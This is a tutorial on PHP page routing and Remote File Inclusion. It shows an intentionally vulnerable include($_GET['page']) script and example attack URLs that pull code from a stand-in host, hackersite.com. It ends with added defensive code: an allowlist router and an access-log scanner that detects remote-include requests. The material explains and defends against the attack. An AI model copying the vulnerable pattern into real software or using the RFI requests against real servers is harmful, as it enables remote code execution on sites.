Webpage Structure and Remote File Inclusion
I. WEBSITE STRUCTURE
In this section, we will show how a web page is built up in general. A normal website consists of HTML. The HTML consists of a HEAD section and a BODY section.

+---------------------------+
|           LOGO            |
+---------------------------+
|        NAVIGATION         |
+---------------------------+
|       MAIN CONTENT        |
+---------------------------+
|  NAVIGATION OR COPYRIGHT  |
+---------------------------+
(Normal looking website layout)

The diagram above is one of the most common website layouts ever.
Code:
<html>
<head>
<title>A Common Website Layout</title>
</head>
<body>
<div align="center" class="logo-area"></div>
<div align="center" class="navigation-area">
<a href="index.php?page=home">Home</a>
<a href="index.php?page=page1">Page1</a>
<a href="index.php?page=page2">Page2</a>
</div>
<div align="center" class="main-content-area">
Content Content Content
</div>
</body>
</html>
This is one of an endless number of ways you could build this website layout with HTML. It will have a logo, a navigation area and a main content area. The navigation will have three links (Home, Page1 and Page2), but none of the links will do anything other than send you to the same page over and over again without changing the content. This type of page is referred to as a static HTML page. The HTML of any page can be viewed by right-clicking the page in your browser and choosing 'View Source' or something similar. This is not true for the PHP code behind a page: the only way to view the PHP code of a page is to read the file itself on the server, not from your browser. Commonly, RFI attacks are possible because of a PHP configuration flag called register_globals, which automatically defines variables in the script from the arguments sent to the page with the GET method. A typical PHP URL looks like http://www.oursite.com/index.php (this is an example only; no such site exists). Now we can rewrite the page above with PHP code in it, to produce different content for each of the links (Home, Page1 and Page2).
Code:
<html>
<head>
<title>A Common Website Layout</title>
</head>
<body>
<div align="center" class="logo-area"></div>
<div align="center" class="navigation-area">
<a href="index.php?page=home">Home</a>
<a href="index.php?page=page1">Page1</a>
<a href="index.php?page=page2">Page2</a>
</div>
<div align="center" class="main-content-area">
<?php
// The PHP body below follows the description in the text; the original
// listing was cut off after the <?php tag.
if (isset($_GET['page']) && $_GET['page'] === "page1") {
    echo "page1";
} elseif (isset($_GET['page']) && $_GET['page'] === "page2") {
    echo "page2";
} else {
    // "home", or no "page" argument at all: show the home content.
    echo "home";
}
?>
</div>
</body>
</html>
The first thing the PHP code does is check whether a GET argument named "page" is present in the URL. If it is, it looks at the argument's value: if the value is "home", it writes "home" into the HTML source; if the value is "page1", it writes "page1", and so on. If the argument is not present in the URL, the script shows the default index.php content, which is equivalent to the "home" page. The navigation links therefore go to:
- Home goes to http://www.oursite.com/index.php?
- Page1 goes to http://www.oursite.com/index.php?page=page1
- Page2 goes to http://www.oursite.com/index.php?page=page2
and so on.
II. UNDERSTANDING RFI
In itself, the include() function is not vulnerable to anything. It is the wrong and dangerous use of it that causes the security issues. The include() function is not limited to reading local files: it can also read remote files from URLs. So you could do include("http://site.com/pages/page.txt") and it would include the contents of page.txt; this is what creates RFI scenarios. Let's create a new scenario with index.php, 1.php, 2.php and 3.php. index.php is the file the user is going to visit with their browser. When the user first visits index.php, we are going to display three links.
Code:
<a href="index.php?page=1">Page 1</a>
<a href="index.php?page=2">Page 2</a>
<a href="index.php?page=3">Page 3</a>
When the user clicks the first link it is going to show the contents of 1.php, when the user clicks the second link it is going to show the contents of 2.php, and when the user clicks the last link it is going to show the contents of 3.php. Now look at the index.php script; this is the code that creates the security hole.
Code:
<?php
if (isset($_GET['page']))
{
    // The GET argument is present. Let's include the page.
    include($_GET['page'] . ".php");
}
else
{
    // The GET argument is not present. Let's give the poor guy some links!
    echo('<p><a href="index.php?page=1">Page 1</a></p>');
    echo('<p><a href="index.php?page=2">Page 2</a></p>');
    echo('<p><a href="index.php?page=3">Page 3</a></p>');
}
?>
Now click the Page 1 link; the browser will show www.oursite.com/index.php?page=1. The PHP script in index.php sees that the user is requesting the page called 1 and includes the value of the URL GET argument + ".php"; the same goes for 2 and 3. So for Page 1 it includes 1.php, for Page 2 it includes 2.php and for Page 3 it includes 3.php. The above script is a death trap. Take www.oursite.com/index.php?page=4: it will try to include 4.php, but that file obviously does not exist, so the page would return an error message like this:
Warning: include(4.php) [function.include]: failed to open stream: No such file or directory in PATH on line 3
Warning: include() [function.include]: Failed opening '4.php' for inclusion (include_path='.;PATH') in PATH\index.php on line 3
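A hardened version of the index.php router, added here as an example (it is not code from the original article): instead of passing the raw ?page= value to include(), the script looks the value up in a fixed allowlist, and only a path from that list is ever included. The $pagesDir location and the resolvePage() helper are assumptions for this example; the page names 1, 2 and 3 are the article's own. The php.ini check is a runtime reminder: remote includes also require the allow_url_include setting (introduced in PHP 5.2, off by default) to be enabled, so keeping it off removes the remote part of the problem even if an include() bug remains.

```php
<?php
// Added example (not from the original article): a hardened index.php router.
// Only page names from a fixed allowlist are ever passed to include(), so a
// value such as "http://hackersite.com/hackercode" is rejected before
// include() sees it.

// Pages that actually exist on disk, keyed by the value accepted in ?page=.
// The names are the article's; $pagesDir is an assumed location.
$pagesDir = __DIR__ . '/pages';
$allowedPages = array(
    '1' => '1.php',
    '2' => '2.php',
    '3' => '3.php',
);

/**
 * Map a raw ?page= value to a file path, or return null if it is not allowed.
 * The allowlist lookup is the real control; the realpath() check is defence
 * in depth in case the allowlist is ever edited to contain a bad entry.
 */
function resolvePage($raw, array $allowedPages, $pagesDir)
{
    if (!is_string($raw) || !isset($allowedPages[$raw])) {
        return null; // unknown page name (covers "://", "..", arrays, etc.)
    }
    $path = realpath($pagesDir . '/' . $allowedPages[$raw]);
    $base = realpath($pagesDir);
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // file missing, or it resolved outside the pages directory
    }
    return $path;
}

// Remote includes should also be disabled at the PHP level.
if (ini_get('allow_url_include')) {
    error_log('allow_url_include is enabled; set allow_url_include=Off in php.ini');
}

if (isset($_GET['page'])) {
    $path = resolvePage($_GET['page'], $allowedPages, $pagesDir);
    if ($path === null) {
        http_response_code(404);
        echo '<p>Unknown page.</p>';
    } else {
        include $path;
    }
} else {
    foreach (array_keys($allowedPages) as $name) {
        // Escape the name so the link markup stays safe if the allowlist keys change.
        $safe = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
        echo '<p><a href="index.php?page=' . $safe . '">Page ' . $safe . '</a></p>';
    }
}
```

A request for page=4 now yields a 404 with no PHP warning, and a page value containing a URL never reaches include() at all, because it is not a key of $allowedPages.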
It is important to note that not all web servers will show error messages when there is an error. Now we will try index.php?page=http://hackersite.com/hackercode (this is an example only; no such site exists). The PHP script would try to include whatever http://hackersite.com/hackercode.php contains, and if hackercode.php contains more PHP code, that code would also get executed. This means any PHP command or function can be run on the server, which is extremely dangerous. Now we will show the .txt case: index.php?page=http://hackersite.com/hackerscript.txt, where hackerscript.txt is fetched and not hackerscript.txt.php, because a ? sign after the file name turns the appended ".php" into a GET argument.
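Added example, not part of the original article: a small PHP script that scans web server access log lines for page= values that look like the remote-include request just described (a value carrying a URL scheme, possibly percent-encoded, or a path traversal sequence). The log lines are constructed for this example in Apache combined log format with made-up addresses and the article's hackersite.com host; findRemoteIncludeAttempts() is an assumed name.

```php
<?php
// Added example (not from the original article): flag access log lines whose
// "page" argument looks like a remote file inclusion request.

// Constructed sample lines in Apache combined log format (addresses made up).
$sampleLog = array(
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=http://hackersite.com/hackercode HTTP/1.1" 200 2048 "-" "curl/7.88"',
    '203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=http%3A%2F%2Fhackersite.com%2Fhackerscript.txt%3F HTTP/1.1" 200 2048 "-" "curl/7.88"',
    '203.0.113.7 - - [10/Oct/2023:13:55:45 +0000] "GET /index.php?page=4 HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
);

/**
 * Return suspicious page= values found in $lines, keyed by 1-based line number.
 * Values are percent-decoded by parse_str() before the check, since the colon
 * and slashes of a URL are often encoded in the request.
 */
function findRemoteIncludeAttempts(array $lines)
{
    $hits = array();
    foreach ($lines as $i => $line) {
        // Request target from the quoted "METHOD /path?query HTTP/x.y" field.
        if (!preg_match('#"[A-Z]+ ([^ "]+) HTTP/#', $line, $m)) {
            continue;
        }
        $qpos = strpos($m[1], '?');
        if ($qpos === false) {
            continue; // no query string, so no page= argument
        }
        parse_str(substr($m[1], $qpos + 1), $params);
        if (!isset($params['page']) || !is_string($params['page'])) {
            continue;
        }
        $page = $params['page'];
        // A leading scheme (http:, https:, or any other stream wrapper) or a
        // ".." segment has no business in a page name.
        if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $page) || strpos($page, '..') !== false) {
            $hits[$i + 1] = $page;
        }
    }
    return $hits;
}

foreach (findRemoteIncludeAttempts($sampleLog) as $lineNo => $value) {
    echo "line $lineNo: suspicious page value: $value\n";
}
```

Run against the sample, the script reports lines 2 and 3 (the plain and the percent-encoded remote URL) and stays quiet on the ordinary page=1 and page=4 requests. The same check belongs in the application's own error log as well, since a hardened include() will reject these values and log them before any remote fetch happens.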